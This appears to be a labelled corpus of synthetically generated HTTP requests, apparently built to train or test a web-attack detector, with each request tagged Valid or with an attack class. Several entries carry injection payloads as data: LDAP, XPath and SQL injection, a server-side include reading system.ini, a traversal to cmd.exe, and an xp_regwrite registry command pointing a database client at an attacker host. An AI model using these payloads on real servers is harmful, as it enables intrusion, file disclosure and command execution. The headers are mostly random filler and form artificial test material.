GET /ae3AltbeObsstga/lrjqftpqre3dJKC/PeaslIe4Tnr0dujo9/lHsnolMN/t6xUi4ee1PkJ/oCgEyraceithdheh7eYe/ac2.tiff?hewytrxaduti38x=7&naettmthiebtn=tkdG5kNlr&trns2etlgadf=621298172&lrdm7io=3nddishegslalt&e2hoejamswat=18&bjOw@g8ccmQ=hG3HnSLF&zebnseI9=82354&s5=o HTTP/1.1
Host: www.wtuReeU.st:80
Connection: keep-alive
Accept: audio/x-wav, image/jpeg;q=0.0
Accept-Charset: x-mac-japanese, windows-1258;q=0.3, x-mac-hebrew, iso-2022-jp;q=0.5, iso-8859-3
Accept-Encoding: 
Accept-Language: lnerne8-l
Cache-Control: O='hnaia'
Client-ip: 255.154.164.96
Cookie: madartcdrCRc=dP@.7nQUg@Rf;I32xrmfC=2454;eiaC=45041470;r9oz=euuhbankrsighPiil;teydW=orEQso0reT
Cookie2: $Version="824"
Date: Thu, 24 Jul 08 22:01:59 GMT
ETag: W/"vmSA-6D5iyFnqPDf"
Expect: oetHs=1eAesvAa;yakds0m=fEe3
From: oxndn@a7opriy.uk
If-Modified-Since: Fri, 13 Jun 08 03:21:51 GMT
If-Unmodified-Since: Wed, 04 May 05 03:56:44 CET
If-Match: *
If-None-Match: *
If-Range: "kRAbYuM8Wnioy3cx8Vp"
Max-Forwards: 923
MIME-Version: 3.1
Pragma: 1uigyrih=htay
Proxy-Authorization: NTLM dHRtN29tZWlhZW5xdG90UmlldG44U2FyZWVyYzdueHRhNmFmZHNobEVybG4=
Authorization: Digest cnonce="ii2a"
Range: -8809,701-32,26-
Referer: /hRxzva/ag5Tq/paTsEo/a0f8.tar
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: re1B5yoU http://www.thheig.gov
UA-CPU: StrongARM
UA-Disp: 2800,8749,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 305x8403
Via: 1.0 209.255.243.223:39198, Y3u/5.2 252.231.17.157:790, 8.8 5.174.214.238
Transfer-Encoding: nIyd; okah667m=5oqy
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 303 www.herida.css "typL" "Tue, 07 Mar 06 04:42:54 GMT"
X-Forwarded-For: 69.243.92.99
X-Serial-Number: 40823
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 788
Start - Id: 23226
class: Valid
GET /phruonnaN/esH0bCBXNq3uK.32mlJ/n-Nf_2X5XZ/tx5H14g5iaqURYokN/rPslkl8i6AbodU.css? HTTP/1.1
Host: 229.249.115.242
Connection: rrxl2eei
Accept: */*;q=0.4
Accept-Charset: cp-932
Accept-Encoding: gzip
Accept-Language: yldrct-dAhtdf, Eeh3ecbo-9ej, trQ-zu;q=0.7, dCnanSs-eohhyuit, sae-iarc;q=0.5
Cache-Control: no-cache
Client-ip: 91.26.190.240
Cookie: s5xt7n=]Ze
Cookie2: $Version="4"
Date: Fri, 07 Dec 07 10:00:31 GMT
ETag: "v.gM9qmtiHYDT5vW"
Expect: 100-continue
From: aomoui@he6m.net
If-Modified-Since: Thu, 23 Nov 06 01:50:33 CET
If-Unmodified-Since: Tue, 26 Apr 05 14:57:37 GMT
If-Match: *
If-None-Match: "m6tLG4jgGRej4Y020xfT"
If-Range: *
Max-Forwards: 04
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aGllZGFvd2FuYTRvbGxvYklhZFhpN2VhY2hybHRUc25sN295cnlsaWVza283
Range: 209-,55-
Referer: /ne1hfufi/yrnfa/drein0/brkcs47e.gz
TE: gzip;q=0.7
Trailer: Via
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 9.1; tn-hu; rv:0.4.7) Gecko/89310446
UA-CPU: StrongARM
UA-Disp: 070,0093,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 973x7584
Via: HTTP/8.1 www.vrs9tNpl.tiff:2, sEs/5.9 193.236.23.253:4, uehuji/8.1 36.180.190.148
Transfer-Encoding: identity
Upgrade: ti3fo/5.3
Warning: 866 www.iesEfey.jpg:21695 "zbyenndTms" "Fri, 26 Sep 08 08:03:01 UTC"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 9726059
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23226
Start - Id: 38706
class: LdapInjection
GET /edyiiapdsntordi/t6riF/Isklb/xMg0dall/hjJrW/rijtSearseofe82s/wd/wNfKNbs@pX61qX/cnC.aXL_xGRcT@ZnO/s_V_7.HzEFR7zx.msf?eed=%29%28%7C++%28++++cn%3D*o+++%27brien*++++%29%28mail%3D*o+++%27brien*+%29 HTTP/1.0
Host: www.eed1gfmeie.org
Connection: close
Accept: */*
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 244.26.7.222
Cookie: qGvmr=stg;1rArt1fccTu=4xp_hd1;2mhKyrG9qO2=rq4BJeJ;oRRS-t=n3binoe7;.vjqk1em0t=aaus
Cookie2: $Version="4"
Date: Tue, 24 Aug 04 23:50:27 GMT
ETag: "reblJM@JhjDKJuspgdM"
Expect: rsracoa
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Fri, 01 Jun 07 06:38:43 UTC
If-Unmodified-Since: Thu, 19 Mar 09 21:59:15 CET
If-Match: "98Fjs4vs5yXbPmVy"
If-None-Match: *
If-Range: Thu, 31 Aug 06 09:08:23 UTC
Max-Forwards: 1383
MIME-Version: 5.4
Pragma: 09ws='I0o'
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: http://www.edwWN.de/vbsps/mhm8eH.tar.gz
TE: deflate;q=0.3,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 8.0; ob-an; rv:9.3.3) Gecko/34238882
UA-CPU: PowerPC
UA-Disp: 849,080,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: 9.9 138.205.90.6, HTTP/7.6 171.134.190.96:675, wdt/4.3 123.202.51.115:79
Transfer-Encoding: compress
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 2036452883987
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38706
Start - Id: 49915
class: XPathInjection
GET /aRGaREoD/lrlTeiNilSGre3ete/h5RG9hvh0/a5mhhbt/vr.gif?i5mttkrV0Ens=fjni1tr8alnn9algm&oeaeoro=pGX&paff=eAGTWm-i&ttpto3mdsgbTu=%27ioc18bdIwvhtK%5C&npG0dkJM8T=eC7&eshi=ewUTygo6emcae&jltr=jnnxcqu%27+++or+++6+++++%3C+count%28path%2Fchild%3A%3A*%29++or++++%27gueve%27+%3D++%27 HTTP/1.1
Host: www.oaimTs.ch
Connection: orue
Accept: video/mpeg, application/*
Accept-Charset: windows-1252;q=0.2, us-ascii, hz-gb-2312, gb2312;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: as1Eothlh=46Tbs;Yopen_link_ExlbF=wNFV4AaRbZU;05r2l=tiprocessing-instruction;4le9irena=?i;r$gE%no;veenlyetmhwnrr=Ee5;uSe9Thaa9=043
Cookie2: $Version="34"
Date: Mon, 02 Nov 09 17:35:53 GMT
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
From: aelt@h8mn.it
If-Modified-Since: Wed, 19 Nov 08 22:46:08 UTC
If-Unmodified-Since: Fri, 15 Jul 05 04:22:57 UTC
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: "ml4grFkCdxqT-bECajWu"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: Digest algorithm=MD5-sess
Range: -983
Referer: /iir7uIbh/fetwa.asmx
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.8 (compatible; ndte; WinNT; stscd; ecoArlsAt)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 4.6 80.105.244.241:61291
Transfer-Encoding: compress
Upgrade: ldT/6.4
Warning: 667 135.165.221.99:10 "Vigl" 
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49915
Start - Id: 40689
class: SSI
GET /7c9k5gZyogOhQV.Cb05/2DT.-P0wgz/222nea26/seM.GHh2lNacsokwCfJi/cRleHttotzEiN3t9unoh.msf?ssiwTdiic=5234091&ernlnbdnrynr=ezsgamdwexec&aer3maiEiaDe=abinttg3xuxj&at0leeimb=%3C%21--%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&EI2u5fE4=tnAu&itdharsTaq2t=meU%3E HTTP/1.0
Host: 163.162.241.144:80
Connection: keep-alive
Accept: image/png, application/x-tar;q=0.5
Accept-Charset: *
Accept-Language: *
Client-ip: 194.79.71.60
Date: Fri, 27 Nov 09 10:12:31 GMT
If-Modified-Since: Mon, 19 Apr 04 20:51:18 UTC
If-Match: *
Authorization: Digest cnonce="DwaHa9"
Referer: http://l9icuug8.gov/i1eeGyr/eob5tt/9eeid/eZin6eo/eiog.avi
TE: deflate;q=0.2
User-Agent: Mozilla/9.1 (compatible; MSIE 0.6; WinNT; jlahnF; hesha)

null

End - Id: 40689
Start - Id: 1856
class: Valid
GET /tS_5Vz9/TBoe/9zF41wconnectyinsertF/ltt3vkes.css?group bytLcgdelete3accepta=tso+2b%294s&ll=itIa2o+daadqq&s2bCritl6wom=ls8ialoge3rwinntv+e&CTArDdd0AX=ixzoy&ehh=t5&8ctwT=t66WkAM&-KRIJ=hd%3Bh&onpbhbnTezuun=esgqs5telnetw&G1jVzdivr=id7et7dileebdut&aexpUhaahtU=+D&EDUX.9=lsrertasgosgeAre&awwefocuw=%5Boxechocecho&C9h33e7nVUpassthru=1&otso=xnniaeyeeto%2Bel&1iedeine4otoyt=dhTts0a HTTP/1.0
Host: www.gi18eO.net:04464
Connection: i3ts4
Accept: */*;q=0.1
Accept-Charset: euc-jp;q=0.0
Accept-Encoding: 
Accept-Language: td2thny-on5t, e1gwi-usepw, ebo-stepo
Cache-Control: max-stale=2631
Client-ip: 188.102.222.214
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="36"
Date: Mon, 18 Sep 06 15:57:45 GMT
ETag: "@PZ9hT2@mrfZ-kcWb"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Wed, 20 Jul 05 09:31:20 GMT
If-Unmodified-Since: Tue, 29 Jun 04 17:50:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 9.5
Pragma: flrhs0sa=ao
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: Basic cGkwYjpkTXM4Z20=
Range: -34624,61390-055,75119-
Referer: http://www.ovxtseja.uk/euoasztx/ttsss/zepiylt/3dyea.sh
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/3.3 (X11; U; Open BSD i386 5.9; or-ht; rv:6.4.2) Gecko/75691463
UA-CPU: Sparc
UA-Disp: 171,774,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 063x9656
Via: FTP/4.3 www.eeItha1.jpeg, 5.0 www.lumxirHU.js:02, 5.9 www.fd8oS8l.jpeg
Transfer-Encoding: identity
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 194.51.251.17
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1856
Start - Id: 42483
class: SqlInjection
GET /lUBV2QWc8@sMz/rh1/rq/gc6EiconnectJ7fwprocessing-instruction-hh/winputOV/8pZTU/rdi5itaniiou/BGrHlocationclsBFJvrJ/t3H9xyeoGPfpcxG9fp/svxgJt5mjebTOnTCF9/gS/oferilhueaointknv.jpeg?toAtlthnjgcdu=lifa&.iLZsbinxtermvbscriptXty=8%3Chtacceseefptg+%3Fha&ce5yrrvea=244&elw=OR+%274Od%27++++%3D+++++%27+++++%27&ihttplocationqvbscriptvwLNziframe=kbdo9&iuafocnseihanf=6150156566&uEde6iailiA9eTi=109&arnFl=tidA&a2oajbR=0&qi5tumre=4216&YeokxgY9npdcaje=9229&cFDh2jWAPv=2%29Wb%3F&2winnt96I1ca9=511&fml1whgtohotl=018495874 HTTP/1.0
Host: www.dctan.de
Connection: close
Accept: video/*;q=0.2
Accept-Charset: koi8, windows-1251, iso-8859-5;q=0.0, iso-8859-15
Accept-Encoding: *
Accept-Language: egasqdl-A;q=0.8, jiy-ninmc;q=0.5
Cache-Control: no-cache
Client-ip: 89.45.12.136
Cookie: oS=tEri
Cookie2: $Version="2"
Date: Tue, 29 Nov 05 10:49:10 CET
ETag: W/"Q67gi5QIz6CB_K32b"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Mon, 11 Feb 08 05:13:38 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 720
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: emmed 32haU8=slot
Range: 7-59040
Referer: /oinyh/mc3u/eNhie/eiece.nsf
TE: deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (Windows; U; WinNT 7.6; he-es; rv:5.8.1) Gecko/71890620
UA-CPU: x86
UA-Disp: 1488,9515,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 733x829
Via: HTTP/2.6 www.onoc.tiff, FTP/2.5 11.114.114.134, 4.7 www.rtta.png
Transfer-Encoding: gzip
Upgrade: i9t/0.4, rer/6.1, the/8.5, Dxmt/8.7
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42483
Start - Id: 5416
class: Valid
POST /rX8DyQKtl4@_ml2uowzy.exe? HTTP/1.1
Content-Length: 169
Content-Language: iP,ocPe,tgef6UL
Content-Encoding: deflate
Content-Location: /otTNe/cseqis90/59oiR.css
Content-MD5: bjZPNHJldXJhcW1FdW5vbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Feb 06 05:45:19 CET
Last-Modified: Mon, 06 Oct 08 12:25:57 GMT
Host: 142.152.87.251
Connection: gcliowd
Accept: application/*, video/*, audio/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, deflate, identity
Accept-Language: nroOn-jsel;q=0.3, itnnetr-w9ctia
Cache-Control: only-if-cached
Client-ip: 113.143.26.134
Cookie: krdfsgD2=8445;laaelsrypT=813700129;mssO=3;8or=aswuamkausoomnii;nauamoiau=s6ush;peTsedpo=2072
Cookie2: $Version="249"
Date: Fri, 12 Feb 10 19:05:55 UTC
ETag: W/"vt.0GkL2HP63RDUQ0If"
Expect: e1h4heeB
From: aoaomzge@wiejdTf.ch
If-Modified-Since: Fri, 09 Jul 04 06:10:05 UTC
If-Unmodified-Since: Sun, 21 Jan 07 12:57:15 CET
If-Match: "s2tMd1cEK.s24GdST"
If-None-Match: *
If-Range: Thu, 12 Jan 06 03:56:50 UTC
Max-Forwards: 3
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM YWt3SHRhbmRlOGlzaWM3NnRhdG5oMFM2b25ocnRvMHJkeURyc2VhZUFkMWk=
Authorization: Basic WGVycjp1YWZy
Range: 33401-381,35239-,-73
Referer: http://www.yaunocLl.st/rTsenDp/cetasSI/auae/liif0lc.conf
TE: trailers,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 4.4; qe-n2; rv:9.0.9) Gecko/60312414
UA-CPU: MIPS
UA-Disp: 958,782,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 237x186
Via: FTP/7.6 120.62.119.52:8, sahcwH/2.2 220.191.10.247
Transfer-Encoding: 0aaMeb
Upgrade: s4syeh/8.2, Palt/1.0
Warning: 758 183.182.45.114 "ztx0agr" 
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Oaamn=lE&bi=nJ2.HoKNLcDu&t0=owoenehttpnoo&lBeNymrhsartka=frt7gnunoaInnueh&O9o2aH6AudSuhet=iVVra&UpEw=bd4sqonufo1Sewm4&ttusP=0&een=59880567&y7thEza=380&egau4nirtgtaz=S~

End - Id: 5416
Start - Id: 31300
class: Valid
GET /sRn0i/2AmASsjrMve3Y/wO/wtig/E3tPLHk6m/I9d4dsnblei/OOlMLC@.gif? HTTP/1.0
Host: www.jheleampir.ch
Connection: ghpga
Accept: audio/*, audio/x-wav;q=0.1, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 30.86.131.32
Cookie: nt=4gAxMu@D9;hg=s;xeHn=Oechoyreb7;Ugng=69535
Cookie2: $Version="86"
Date: Thu, 08 Feb 07 24:33:11 UTC
ETag: W/"hRKr@QzFOCPSej2VzYnZ"
Expect: 8ref
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Wed, 05 May 10 15:22:51 CET
If-Unmodified-Since: Fri, 04 Apr 08 18:25:38 UTC
If-Match: *
If-None-Match: "A1Eq.LiVjwNzuknD"
If-Range: *
Max-Forwards: 9199
MIME-Version: 8.7
Pragma: txeaw=8alrtou
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Basic dGhrdHMzSGU6cnR0M3pkaQ==
Range: -388719
Referer: http://www.i1od0.be/xgoulsa.exe
TE: gzip;q=0.7
Trailer: If-Range
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 1.9; es-6t; rv:7.9.8) Gecko/02649228
UA-CPU: Sparc
UA-Disp: 913,006,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3795x126
Via: 5.4 186.176.134.245, 1.4 142.27.67.111
Transfer-Encoding: x1o9; xo5st3=1ekd
Upgrade: GorsU/6.8
Warning: 321 www.eor2Lmo.js "uenlgbdrgd" "Thu, 25 Sep 08 14:31:46 CET"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 19975103702041992
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31300
Start - Id: 10994
class: Valid
GET /noueU7rses6nrEtgr/imzaJkMgUSicGvK/anhFBUQtAIa-nk/hfmfXokdfGRz/mrftJF02GnV-PT/vxjA2LkXlC/2wb1mlt1eetx/Soegtdha/nRihaxtte3appnh9/mchv4_d/Rse.swf?hi4aeyse=iouhm7s11laptdnnew&haeeor=t%5DftFdaNis&HsSPZhavingOMsP=9&aeet5=21&n0j2EStcTeze=pqUBFtShDB&trsEeieehfnnE=5Wm.&ato=s8N2Kq&soeoiaaEDwfveIr=18&jswhmeegeet=erasef7p HTTP/1.0
Host: 242.237.4.78
Connection: Ysqn5o
Accept: image/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2289
Client-ip: 160.197.226.194
Cookie: nb=tuupdate;YtTtdeu4Sea=758849
Cookie2: $Version="940"
Date: Sat, 26 Sep 09 22:20:50 CET
ETag: W/".m3CZgLSzXAn1PocvZF7"
Expect: kas1wl
From: Oimrip@itut.fr
If-Modified-Since: Thu, 28 May 09 09:56:18 GMT
If-Unmodified-Since: Mon, 25 Jun 07 23:42:06 CET
If-Match: *
If-None-Match: "@DCC8JyZLXna2Ei"
If-Range: Mon, 09 Feb 09 03:10:06 GMT
Max-Forwards: 977
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest qop=kimet5
Authorization: NTLM dGFSbnhnb29rc2RuN2c3aGh3SW5ybmVzSGVuZk50c3Jh
Range: 415535-51
Referer: http://www.apepaft.cz/5Ftekea4/e6gEEaka/tnein/tyil.pl
TE: trailers
Trailer: Date
User-Agent: su0l (ty-a6Rpr; sz5aAf)
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 124x705
Via: FTP/0.5 www.smecmys.jpg, HTTP/4.3 www.dwO5as.jpeg
Transfer-Encoding: compress
Upgrade: ysptV/3.4, ratwrs/9.8, Ssil/9.8
Warning: 203 www.rshjafcw.gif:00 "oocSb7oh" 
X-Forwarded-For: 40.189.230.161
X-Serial-Number: 109708230731
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10994
Start - Id: 44456
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 156.240.211.77
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: Aoeo-e5, oLAT-d7iwsl, eynn-uh, teut-ap;q=0.7
Cache-Control: only-if-cached
Client-ip: 88.25.210.223
Cookie: saaNuo=4\e;tesboblORmpsldo=92887;tpie=thAl;tTrsmnyal=diae5bttEitmP~;Iesoeae2ngfalth=r7
Cookie2: $Version="0"
Date: Tue, 27 Apr 10 17:01:42 CET
ETag: "Bc5LCDc_8.QFCBUmEc7y"
Expect: 100-continue
From: j7edhan@ytphgnbey0.biz
If-Modified-Since: Tue, 17 Aug 04 12:13:40 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 39
MIME-Version: 1.4
Pragma: trzin='etkp4ct'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic ZnRzcmFvOmVzYXhn
Range: 6-02287,72753-
Referer: http://www.Sepaempe.net/8a6TMp/h6hefAry.pl
TE: gzip
Trailer: Expect
User-Agent: Mozilla/1.5 (X11; U; Open BSD i386 3.0; 3z-Er; rv:1.1.6) Gecko/87762408
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 0.9 www.tseim1a.css, 7.6 125.143.134.253, FTP/1.7 77.130.186.121
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 315 155.65.62.19 "entgnaeqidlakodma" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44456
Start - Id: 36392
class: OsCommanding
GET /0fyLd-Xy/9Iw/3tseaoeerrEicAjh/sreGaatoetrifnt/eyfneeoj9eatitm.jsp? HTTP/1.0
Host: www.tAsaOsyE.gov
Connection: rrdseh7
Accept: */*
Accept-Charset: iso-8859-7;q=0.0, iso-8859-15;q=0.5, x-mac-cyrillic;q=0.3, x-mac-chinesesimp
Accept-Encoding: exec   xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','7iUlwnDl','REG_SZ','DBMSSOCN,hackersip,80'
Accept-Language: *
Cache-Control: no-transform
Date: Wed, 19 Sep 07 01:42:07 UTC
ETag: "soerNoi6Ix9Ci-A7lG"
Expect: eaGoR
If-Range: Tue, 25 May 04 17:09:04 UTC
Max-Forwards: 229
Referer: /ea3a3I.asp
User-Agent: 9neotosass (wdKhUV; 4haYRNZI4Y; oMVVD4; szK3jwPoCY)
Via: 2.0 www.zsruaa5e.htm, e4a/8.1 www.dsmoo.htm:03722

null

End - Id: 36392
Start - Id: 4779
class: Valid
PUT /2asdeneaEJetrirpdts4/xthieenestrdea/hqo4/cIK/2IdHCadV3j4aSAy3iLp/cnGZNMMO_CdMrqE9/ncb_TtUIAp8iQb2sQqK/eaClquE/4ajbo5bglrEnEh9bzD1/nzTwq.cgi? HTTP/1.1
Content-Length: 69
Content-Language: asr7aAov,pptc,ttv0Htn
Content-Encoding: gzip
Content-Location: http://moaesq.de/es9mzizR/57bsi3r3.php
Content-MD5: Y213TG5vYWwzNnkwb2xzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Jan 06 01:25:25 CET
Last-Modified: Mon, 10 Jan 05 01:18:23 UTC
Host: www.sWrh.uk
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: gb2312, euc-tw;q=0.7, euc-tw;q=0.3, x-mac-icelandic;q=0.2, windows-1250;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=6
Client-ip: 187.93.237.97
Cookie: eY6taw=srrf
Cookie2: $Version="1"
Date: Wed, 07 Sep 05 11:47:00 UTC
ETag: "qBJcdA11IyNlUnRQUtm"
Expect: mijtq5m
From: 4adah@os1EUenswi.uk
If-Modified-Since: Sat, 28 Aug 04 07:24:39 GMT
If-Unmodified-Since: Sat, 20 Dec 08 09:19:12 UTC
If-Match: *
If-None-Match: "XjejdQqNjI9Ai3m"
If-Range: Sun, 15 Nov 09 13:21:18 GMT
Max-Forwards: 96
MIME-Version: 0.4
Pragma: nesstue='vOA'
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: vwe1d r2enpe=ept8tsN
Range: 1757-72,-28304,0-
Referer: http://www.aCe9.be/ntPE/ctOonE/knuA5n9.tiff
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 2.0; zo-ew; rv:5.9.3) Gecko/77587831
UA-CPU: PowerPC
UA-Disp: 109,747,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 425x376
Via: rmnarl/7.6 www.ejrgsy.shtml
Transfer-Encoding: deflate
Upgrade: zedlh/8.1, naR/6.0, eeufs/3.6, reei/8.9, fshaut/4.2
Warning: 541 246.190.52.10 "Lgejbyurversetq" "Sat, 20 Jun 09 14:22:24 UTC"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eElIA@8OVBLJ= eh&eoii=5&Mjrsw8re=293286&ahdr9eorquoew=s0mpyrn2sohntes

End - Id: 4779
Start - Id: 34595
class: Valid
PUT /eNGBYI31YRd-f/tC4OCtgOI@D./kDPt.jsp? HTTP/1.0
Content-Length: 167
Content-Language: Ao,rvdvitmn,ii
Content-Encoding: gzip
Content-Location: /eiuo/nomt2/tt0eh7nt/tiueg.doc
Content-MD5: YzdmbjVzcWJtYzR1MXB0MA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Aug 07 01:17:47 GMT
Last-Modified: Mon, 09 May 05 14:30:48 CET
Host: 155.110.98.250:6079
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress, compress;q=0.5, identity
Accept-Language: *;q=0.2
Cache-Control: seoy='i5s'
Client-ip: 7.105.70.126
Cookie: tiaidppnai=00630
Cookie2: $Version="9"
Date: Sun, 03 Oct 04 19:26:29 UTC
ETag: W/"LxEfvKTjP9LbiDf"
Expect: 100-continue
From: hAcasd@ertucieec.de
If-Modified-Since: Thu, 21 Jan 10 09:42:20 UTC
If-Unmodified-Since: Sun, 11 Apr 04 08:57:28 UTC
If-Match: "jYyG0Vw3ecOPnygZ_Fqu"
If-None-Match: *
If-Range: "9I_Yo_wY_uQ1ta_SE"
Max-Forwards: 712
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: amH2c rnecro=ka4eNao
Authorization: NTLM Z25yYWhvMHJoRWZlVG9vZWFzZ0k4b2lBc2h0Ykxubmlu
Range: 1867-,-2727
Referer: /ss6nkoH/iuqo/9hces/0cii4gti.bin
TE: trailers,trailers,chunked
Trailer: Date
User-Agent: dnkxRiD/8.5.8
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: 9.5 www.oe37onN.gif, FTP/3.2 122.37.153.39
Transfer-Encoding: compress
Upgrade: aiiee/8.2, tosd/8.9
Warning: 945 www.eeodke.htm "hasrmstcsdtwtkpyg" "Tue, 18 Dec 07 06:07:29 UTC"
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Z6TXd=tq8&nneyp=Sriwsree&7tenaomse=5436635&wn2eafeiAol=wnoehftpbsperl0dyseo&R7PPdF=fVcGSlp2yniahbt&se=e&Tnnq=:[prf&rt6i0avzue0=5&oYrb=b8Etf&98ttoaozfewi=b28RnQXRQ1

End - Id: 34595
Start - Id: 4965
class: Valid
